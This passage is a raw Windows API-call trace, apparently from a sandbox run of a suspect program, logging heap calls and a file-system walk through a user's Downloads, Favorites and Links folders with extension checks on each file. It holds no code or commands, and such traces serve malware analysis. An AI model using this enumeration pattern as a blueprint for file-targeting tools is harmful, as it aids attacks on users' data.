lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e798 [0204.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.239] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.239] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.239] PathFindFileNameW (pszPath="") returned="" [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.240] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.240] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0204.240] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0204.240] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.240] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.240] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.240] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e798 [0204.240] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.240] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.241] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.241] PathFindFileNameW (pszPath="") returned="" [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.241] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.241] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.241] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0204.241] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff1f8 [0204.241] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x3b7c6a8 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff190 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32feb78 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2d78 [0204.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff330 [0204.242] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2d00 [0204.242] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b98 [0204.242] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0204.242] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.242] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0204.242] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e798 [0204.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.243] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.243] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.243] PathFindFileNameW (pszPath="") returned="" [0204.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.243] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 